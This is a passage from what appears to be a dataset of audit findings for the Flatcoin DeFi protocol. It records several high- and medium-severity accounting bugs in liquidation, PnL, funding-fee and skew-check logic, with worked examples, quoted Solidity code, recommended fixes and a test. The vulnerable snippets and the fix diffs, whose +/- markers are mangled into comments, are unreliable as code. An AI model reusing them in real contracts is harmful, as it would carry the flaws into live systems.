total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position Alice (LP)\\nMargin = 70 ETH\\nPosition Size = 500 ETH\\nLeverage = (500 + 20) / 20 = 26x\\nLiquidation Fee = 50 ETH\\nLiquidation Margin = 60 ETH\\nEntry Price = $1000 per ETH Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subjected to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should goes to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + (-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(5)) = 125\\n```\\n\\nThe reason why the profitLossTotal = -5 is because there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect. Because the vault's collateral balance now is 170 - 50 (send to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.чTo remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. No revert.чThe following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.ч```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n -Asymmetry in profit and loss (PnL) calculationsчhighчAn asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n ._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $500\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at 𝑇1 and the gain of $60000 at 𝑇2, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we have used the dollar to compute the PnL, both scenarios will return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important note above)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$\\nAlice's Long Position Bob's Long Position\\nPosition Size = 100 ETH\\nEntry Price = $1000 Position Size = 50 ETH\\nEntry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviated from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\nчConsider tracking the PnL in dollar value/term to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nCompared to SNX V2, it is not vulnerable to this issue. The reason is that in SNX V2 when it computes the PnL, it does not \"scale\" down the result by the price. The PnL in SNXv2 is simply computed in dollar value ($positionSize \\times priceShift$), while FlatCoin protocol computes in collateral (rETH) term ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\nчLoss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.ч```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n -Incorrect price used when updating the global position dataчhighчIncorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\nчUse the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\nчLoss of assets for the LP as mentioned in the above section.ч```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n -Long trader's deposited margin can be wiped outчhighчLong Trader's deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 is $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. Thus, the condition at Line 232 will be evaluated as `false,` and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` result in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.чIf the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determine if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTota + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\nчLoss of assets for the long traders as mentioned above.ч```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n -Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage AdjustчmediumчFees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen user withdrawal from the stable LP, vault total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen _withdrawFee is calculated and checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, vault collateral is settled again with withdrawFee, keeper receives keeperFee and `(amountOut - totalFee)` amount of collaterals are transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of keeper fee and withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means withdrawal fee is still in the vault, however this fee is ignored when checks skew max and protocol may revert on a safe withdrawal. Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt the moment, there is `100` collaterals in the Vault, skew is `0` and skew fraction is 100%;\\nAlice tries to withdraw `16.8` collaterals, withdrawFee is `0.168`, after withdrawal, it is expected that there is `83.368` stable collaterals in the Vault, so skewFraction should be `119.5%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when protocol checks skew max, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when protocol executes a leverage open and leverage adjust, in both executions, tradeFee is ignored when checks skew max.\\nPlease see the test codes:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out `vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\nчInclude withdrawal fee / trade fee when check skew max.чProtocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even if the execution is essentially safe.ч```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n -In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position dataчmediumч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is positive value, then `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is negative value, then `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh 